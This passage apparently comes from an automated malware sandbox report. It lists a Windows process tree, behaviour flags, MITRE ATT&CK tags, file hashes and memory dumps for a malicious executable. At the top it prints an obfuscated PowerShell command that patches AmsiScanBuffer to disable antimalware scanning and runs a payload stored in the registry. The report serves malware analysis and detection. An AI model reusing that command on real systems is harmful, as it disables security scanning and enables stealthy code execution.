$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+'e'+'m'+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+'f'+'t'+''+'.'+''+'W'+'i'+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+'e'+'Na'+'t'+''+'i'+''+'v'+''+'e'+'M'+[Char](101)+'t'+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$NpcZZoKdDOoebt=$waskEbzTPtUNn.GetMethod(''+'G'+'e'+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+'d'+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+''+'S'+'t'+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ugOEbBiWAhFGOeacujA=axylMltnpBep @([String])([IntPtr]);$lWgPbiiipEWoIthNRTnKvp=axylMltnpBep @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UnpskIbieQE=$waskEbzTPtUNn.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$IJdOrPdYiSFhDw=$NpcZZoKdDOoebt.Invoke($Null,@([Object]$UnpskIbieQE,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$JfvaoopxDKNVKXRIX=$NpcZZoKdDOoebt.Invoke($Null,@([Object]$UnpskIbieQE,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$jTgnQTX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IJdOrPdYiSFhDw,$ugOEbBiWAhFGOeacujA).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+'l'+'');$DsFyAWBNMmRMPMhSV=$NpcZZoKdDOoebt.Invoke($Null,@([Object]$jTgnQTX,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$voYJXCfEms=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JfvaoopxDKNVKXRIX,$lWgPbiiipEWoIthNRTnKvp).Invoke($DsFyAWBNMmRMPMhSV,[uint32]8,4,[ref]$voYJXCfEms);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DsFyAWBNMmRMPMhSV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JfvaoopxDKNVKXRIX,$lWgPbiiipEWoIthNRTnKvp).Invoke($DsFyAWBNMmRMPMhSV,[uint32]8,0x20,[ref]$voYJXCfEms);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:1148
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3788
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3852
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:4600
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3684
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:5068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1300

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1940

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1376

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2580

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2824

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3352

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3452
- C:\Users\Admin\AppData\Local\Temp\133fda00a490e613f3a6c511c1c660eb.exe
  "C:\Users\Admin\AppData\Local\Temp\133fda00a490e613f3a6c511c1c660eb.exe"
  2⤵
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4052
- - C:\Users\Admin\AppData\Local\Temp\$774c65ac
    "C:\Users\Admin\AppData\Local\Temp\$774c65ac"
    3⤵
    - Executes dropped EXE
    PID:2204
- - C:\Users\Admin\AppData\Local\Temp\$77d7e828
    "C:\Users\Admin\AppData\Local\Temp\$77d7e828"
    3⤵
    - Executes dropped EXE
    PID:1352
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 308
      4⤵
      Drops file in Windows directory
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:836
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 312
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3572

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3764

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4160

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4520

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3448

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:2332

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4248

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4448

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3292

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2772

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1924
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1352 -ip 1352
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:944
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1352 -ip 1352
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:1852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9E.tmp.csv

Filesize
34KB

MD5
7a1d8b9bc872d536c99c49fc81b39aab

SHA1
fb67a4ca4dbe30de3cbabf33e75aeec1f980f65c

SHA256
11ed79541da28d682c93af5d1b6f89275d91d96f50e12064ce9cd17b8c89337f

SHA512
8b3c3e80657fac93ef72d9588ec3a4a4aec38fd95c4087012494095b93db39922b62dcffbf58bcdeaf2604c7e6b3444c50af1be29e5002d8a351781c0b20fe6e

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERABE.tmp.txt

Filesize
13KB

MD5
4ac3d9ef61e234f69c14786c2d8b90b3

SHA1
238f18f2a77f1db5cd2bb7c8d81b2fe28cd08069

SHA256
b859584d5c1b2cc5e4df19d4defab0ffd987671a18c717f55d5562377f07316d

SHA512
5a7fbc03af0bc8f8bf90659e3473fe13e8654651b4b80f738261336100939340428f33edff3edbdf833584e3c42d44cdccaf5c4af5b86e867cfaee7fb775ceb3

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD8.tmp.csv

Filesize
34KB

MD5
410ecd12129c57f399cb89f57f26472d

SHA1
34a42ca1d550a78a9820c381014c5c28a2fecefd

SHA256
441dc75ae1b9b65dd73ad4db78e9d29501dfce4be6ed993fcdd0ecacb8a190cd

SHA512
aee83b4cecbb33e50f083aa54f91a113865be0d9483aee52fac03c7940e6ece04cef4d9210e3eb05a5dd7ded8b29ed316c6ecd2ab873772a0c51e428e6aa49e1

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE9.tmp.txt

Filesize
13KB

MD5
9b79b44a0c52afd118510f24b1dc929a

SHA1
27b7b56e860b2d6150a24f2ff0183079a682663e

SHA256
8575ddbec3278573f891ded85d5d68539edafb1361d198dd34140140daa3e0be

SHA512
ad12be1ec48d0f3b3467aed6f4a4f4e515258f028b3e1497847698b3fb92c8590fbf54bca0f81305f816e93b69dc0749280c42909b347f562abe0f131684661f

Download Submit
C:\Users\Admin\AppData\Local\Temp\$774c65ac

Filesize
4.5MB

MD5
133fda00a490e613f3a6c511c1c660eb

SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_dbzrlniu.mhw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/400-5893-0x00000202DED30000-0x00000202DED55000-memory.dmp

Filesize
148KB

Download
memory/400-4999-0x00000202DED30000-0x00000202DED55000-memory.dmp

Filesize
148KB

Download
memory/616-4946-0x0000015086780000-0x00000150867A5000-memory.dmp

Filesize
148KB

Download
memory/616-4947-0x00007FFFF6DCD000-0x00007FFFF6DCE000-memory.dmp

Filesize
4KB

Download
memory/684-4959-0x00007FFFF6DCF000-0x00007FFFF6DD0000-memory.dmp

Filesize
4KB

Download
memory/964-4985-0x00007FFFF6DCC000-0x00007FFFF6DCD000-memory.dmp

Filesize
4KB

Download
memory/964-4984-0x000001E84DB90000-0x000001E84DBB5000-memory.dmp

Filesize
148KB

Download
memory/964-5892-0x000001E84DB90000-0x000001E84DBB5000-memory.dmp

Filesize
148KB

Download
memory/2204-4898-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2728-5226-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

Filesize
10.8MB

Download
memory/2728-4913-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

Filesize
10.8MB

Download
memory/2728-4914-0x000001D702610000-0x000001D70263A000-memory.dmp

Filesize
168KB

Download
memory/2728-4912-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

Filesize
10.8MB

Download
memory/2728-4911-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

Filesize
10.8MB

Download
memory/2728-4910-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

Filesize
10.8MB

Download
memory/2728-4900-0x000001D766910000-0x000001D766932000-memory.dmp

Filesize
136KB

Download
memory/2728-4899-0x00007FFFD7743000-0x00007FFFD7745000-memory.dmp

Filesize
8KB

Download
memory/4052-44-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-26-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-58-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-56-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-54-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-68-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-65-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-60-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-12-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-10-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-8-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-18-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-16-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-14-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-5-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-4885-0x00000000745D0000-0x0000000074D80000-memory.dmp

Filesize
7.7MB

Download
memory/4052-4886-0x00000000745D0000-0x0000000074D80000-memory.dmp

Filesize
7.7MB

Download
memory/4052-4888-0x0000000006B30000-0x0000000006B7C000-memory.dmp

Filesize
304KB

Download
memory/4052-4887-0x0000000006A50000-0x0000000006ACE000-memory.dmp

Filesize
504KB

Download
memory/4052-4889-0x00000000745DE000-0x00000000745DF000-memory.dmp

Filesize
4KB

Download
memory/4052-4890-0x00000000745D0000-0x0000000074D80000-memory.dmp

Filesize
7.7MB

Download
memory/4052-62-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-25-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-67-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-32-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-41-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-42-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-0-0x00000000745DE000-0x00000000745DF000-memory.dmp

Filesize
4KB

Download
memory/4052-28-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-30-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-38-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-46-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-48-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-50-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-52-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-37-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-34-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-20-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-5747-0x0000000006C80000-0x0000000006CD4000-memory.dmp

Filesize
336KB

Download
memory/4052-5768-0x00000000745D0000-0x0000000074D80000-memory.dmp

Filesize
7.7MB

Download
memory/4052-22-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-6-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-4-0x0000000006870000-0x0000000006902000-memory.dmp

Filesize
584KB

Download
memory/4052-3-0x0000000006D80000-0x0000000007324000-memory.dmp

Filesize
5.6MB

Download
memory/4052-2-0x0000000006590000-0x00000000067D0000-memory.dmp

Filesize
2.2MB

Download
memory/4052-1-0x00000000004C0000-0x0000000000946000-memory.dmp

Filesize
4.5MB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads